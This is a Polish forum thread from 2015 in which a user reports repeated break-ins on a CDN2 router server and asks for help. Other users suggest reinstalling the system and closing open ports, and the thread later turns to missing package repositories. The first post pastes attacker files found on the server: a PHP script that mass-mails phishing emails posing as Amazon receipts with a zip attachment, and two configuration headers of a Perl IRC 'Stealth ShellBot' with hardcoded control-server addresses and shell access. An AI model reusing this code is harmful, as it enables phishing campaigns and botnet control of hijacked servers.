Freesco, NND, CDN, EOS :: Wyświetl temat - Zabezpieczenie przed wlamaniami cdn2+pliki wlamywacza do spr

Freesco, NND, CDN, EOS http://forum.freesco.pl/

Zabezpieczenie przed wlamaniami cdn2+pliki wlamywacza do spr http://forum.freesco.pl/viewtopic.php?f=40&t=18968	Strona 1 z 1

Autor:	monter [ środa, 18 lutego 2015, 10:59 ]
Tytuł:	Zabezpieczenie przed wlamaniami cdn2+pliki wlamywacza do spr
Czy system cdn2 jest dziurawy ze wzgledu na to ze nie jest juz aktualizowany czy moze to wina konfiguracji ze bardzo szybko mozna sie na niego wlamac? Dlugie hasla weryfikacja 2 etapowa nic nie daly. Juz 2 raz ktos Mi sie wlamal na serwer i pozostawial pliki np takie : <?php $pwd = getcwd(); $email_from = "Amazon LLC <amazon-orders@receipt.com>"; $mail_header .= "Content-Type: multipart/mixed\n"; $email_subject = "Your Amazon order has been dispatched."; // The Subject of the email $email_txt = file_get_contents("index.html"); // Message that the email has in it $fileatt = "$pwd/lllll.zip"; // Path to the file (example) $fileatt_type = "application/zip"; // File Type $fileatt_name = "lllll.zip"; // Filename that will be used for the file as the attachment $file = fopen($fileatt,'rb'); $flsz = filesize($fileatt); $data = fread($file,$flsz); fclose($file); $semi_rand = md5(time()); $mime_boundary = "==Multipart_Boundary_x{$semi_rand}x"; $headers="From: $email_from"; // Who the email is from (example) $headers .= "\nMIME-Version: 1.0\n" . "Content-Type: multipart/mixed;\n" . " boundary=\"{$mime_boundary}\""; $email_message .= "Take Actionfve\n\n" . "--{$mime_boundary}\n" . "Content-Type:text/html; charset=\"iso-8859-1\"\n" . "Content-Transfer-Encoding: 7bit\n\n" . $email_txt; $email_message .= "\n\n"; $data = chunk_split(base64_encode($data)); $email_message .= "--{$mime_boundary}\n" . "Content-Type: {$fileatt_type};\n" . " name=\"{$fileatt_name}\"\n" . "Content-Transfer-Encoding: base64\n\n" . $data . "\n\n" . "--{$mime_boundary}--\n"; $subject = "Take Actionfve"; //$data = file_get_contents("lllll.zip"); $body = file_get_contents("index.html"); if (!($fp = fopen("list.txt", "r"))) exit("Unable to open $listFile."); $i=0; print "Start time is "; print date("Y:m:d H:i"); print "\n"; while (!feof($fp)) { fscanf($fp, "%s", $name); $i++; <------> mail($name,$email_subject,$email_message,$headers); nastepny #!/usr/bin/perl^M # - Adicionado comando !estatisticas ;^M # - Alterado o comando @pacota para @oldpack;^M # - Adicionado dois novos pacotadores: @udp e @udpfaixa ;^M # - Adicionado um novo portscan -> @fullportscan ;^M # - Adicionado comando @conback com suporte para Windows/Unix ;^M # - Adicionado comando: !sair para finalizar o bot;^M # - Adicionado comando: !novonick para trocar o nick do bot por um novo aleatorio;^M # - Adicionado comando !entra e !sai ;^M # - Adicionado comando @download ;^M # - Adicionado comando !pacotes para ativar/desativar pacotes ;^M ^M ########## CONFIGURACAO ############^M my $processo = '/usr/local/apache/bin/httpd -DSSL';^M ^M $servidor='64.32.12.57' unless $servidor;^M my $porta='80';^M my @canais=("#gnu");^M my @adms=("max","laris","x");^M my @auth=("!@max.cc");^M ^M # Anti Flood ( 6/3 Recomendado )^M my $linas_max=6;^M my $sleep=3;^M ^M my $nick = getnick();^M my $ircname = getnick();^M my $realname = getnick();^M ^M my $acessoshell = 1;^M ######## Stealth ShellBot ##########^M my $prefixo = "#";^M my $estatisticas = 0;^M my $pacotes = 1;^M ####################################^M ^M my $VERSAO = '0.2a';^M ^M $SIG{'INT'} = 'IGNORE';^M $SIG{'HUP'} = 'IGNORE';^M $SIG{'TERM'} = 'IGNORE';^M $SIG{'CHLD'} = 'IGNORE';^M $SIG{'PS'} = 'IGNORE';^M ^M nastepny #!/usr/bin/perl # - Adicionado comando !estatisticas ; # - Alterado o comando @pacota para @oldpack; # - Adicionado dois novos pacotadores: @udp e @udpfaixa ; # - Adicionado um novo portscan -> @fullportscan ; # - Adicionado comando @conback com suporte para Windows/Unix ; # - Adicionado comando: !sair para finalizar o bot; # - Adicionado comando: !novonick para trocar o nick do bot por um novo aleatorio; # - Adicionado comando !entra e !sai ; # - Adicionado comando @download ; # - Adicionado comando !pacotes para ativar/desativar pacotes ; ########## CONFIGURACAO ############ my $processo = '/usr/local/apache/bin/httpd -DSSL'; $servidor='88.151.99.145' unless $servidor; my $porta='80'; my @canais=("#ravenul3"); my @adms=("raven","hak"); my @auth=("!@hak.ro"); # Anti Flood ( 6/3 Recomendado ) my $linas_max=6; my $sleep=3; my $nick = getnick(); my $ircname = getnick(); my $realname = getnick(); my $acessoshell = 1; ######## Stealth ShellBot ########## my $prefixo = "#"; my $estatisticas = 0; my $pacotes = 1; #################################### my $VERSAO = '0.2a'; $SIG{'INT'} = 'IGNORE'; $SIG{'HUP'} = 'IGNORE'; $SIG{'TERM'} = 'IGNORE'; $SIG{'CHLD'} = 'IGNORE'; $SIG{'PS'} = 'IGNORE';

Autor:	Maciek [ środa, 18 lutego 2015, 12:05 ]
Tytuł:	Re: Zabezpieczenie przed wlamaniami cdn2+pliki wlamywacza do
Nie można wykluczyć, ze "coś" na CDN2 jest dziurawe i następują włamania za pomocą prostego exploita. Nie wiem, nie używałem, jedynie Saturas mógłby coś powiedzieć. Jednak z dużym prawdopodobieństwem można szukać przyczyn gdzie indziej: - zbyt proste hasła userów systemowych; - źle napisane strony w php, umożliwiające wykonanie własnego kodu włamywacza; Ten drugi przypadek jest dość powszechny. Włamywacz nie uzyskuje bezpośrednich uprawnień w systemie, ale udaje mu się zapisać pliki w /tmp i odpalić skrypty, które do czegoś mu służą.

Autor:	monter [ środa, 18 lutego 2015, 12:23 ]
Tytuł:	Re: Zabezpieczenie przed wlamaniami cdn2+pliki wlamywacza do
Dokladnie w tmp Mi sie pojawiaja pliki nowe.Co do plikow php to mam jeden do pokazywania statystyk niceshapera ale moge z niego zrezygnować. bo serwer potrzebuje tylko do podzialu pasma i przekierowania portow na kamery nawet nie potrzebuje zdalnego dostepu. Da sie jakos utrudnic wlamanie ograniczajac dostep do serwera ?

Autor:	Maciek [ środa, 18 lutego 2015, 23:44 ]
Tytuł:	Re: Zabezpieczenie przed wlamaniami cdn2+pliki wlamywacza do
Jeśli już raz maiłeś włamanie, to system jest trefny. Nie masz pewności, czy coś w nim nie zostało zmienione. Jeśli nastąpiło przejęcie roota, to tylko wyczyścić dysk i zainstalować system od zera. Zobacz co masz otwarte z zewnątrz (iptables -L) i jeśli możesz zamknąć, to zamknij. Choć nie ma gwarancji, że włamywacz nie ma backdoora.

Autor:	monter [ czwartek, 19 lutego 2015, 12:53 ]
Tytuł:	Re: Zabezpieczenie przed wlamaniami cdn2+pliki wlamywacza do
Wiem . Wlasnie zapasowy serwer probuje odpalic na cdn2 ale pakiety chyba nie dzialaja bo pacman nic nie moze pobrac nawet mc a bez mc to nic nie zrobie.

Autor:	CyberDuck [ środa, 5 sierpnia 2015, 20:20 ]
Tytuł:	Re: Zabezpieczenie przed wlamaniami cdn2+pliki wlamywacza do
No wlasnie ... Zaczely sie upaly i chcialem doinstalowac sobie lm_sensors ... Ale sa ciagle problemy z repozytorium extra. Cos sie zmieni w tej kwestii ? Posluchajcie jesli Macie problem z serwerem to moge zaoferowac pomoc.

Autor:	Maciek [ niedziela, 9 sierpnia 2015, 12:37 ]
Tytuł:	Re: Zabezpieczenie przed wlamaniami cdn2+pliki wlamywacza do
O ile pamiętam to po awarii serwera u Albercika (dawno temu), nie udało się odzyskać części danych. Jedyny serwer z pakietami jest pod adresem cdn.freesco.pl - innego nie ma i nie będzie. Czas pomyśleć o czymś innym.

Autor:	CyberDuck [ wtorek, 11 sierpnia 2015, 12:20 ]
Tytuł:	Re: Zabezpieczenie przed wlamaniami cdn2+pliki wlamywacza do
A w źyciu Maćku ... Chyba , że mnie do tego zmusicie

Autor:	CyberDuck [ wtorek, 11 sierpnia 2015, 12:24 ]
Tytuł:	Re: Zabezpieczenie przed wlamaniami cdn2+pliki wlamywacza do
Monter i to nie koniec lanow Sam pracuje w firmie i to rozwijajacej sie w ktorej sprzedaje sie internet przez lan pppoe. Nawet Ci powiem ze tv tez idzie raczej wlasnie w te strone. Sprzet tez bardzo tanieje.

Autor:	rikardo7 [ poniedziałek, 17 sierpnia 2015, 11:00 ]
Tytuł:	Re: Zabezpieczenie przed wlamaniami cdn2+pliki wlamywacza do
Maciek pisze: O ile pamiętam to po awarii serwera u Albercika (dawno temu), nie udało się odzyskać części danych. Jedyny serwer z pakietami jest pod adresem cdn.freesco.pl - innego nie ma i nie będzie. Czas pomyśleć o czymś innym. A nie jest to czasem repo CDN a nie CDN2?

Autor:	Maciek [ czwartek, 20 sierpnia 2015, 17:24 ]
Tytuł:	Re: Zabezpieczenie przed wlamaniami cdn2+pliki wlamywacza do
Nie wiem. Wiem, że jest jedyny.

Strona 1 z 1	Strefa czasowa UTC+2godz.
Powered by phpBB® Forum Software © phpBB Group https://www.phpbb.com/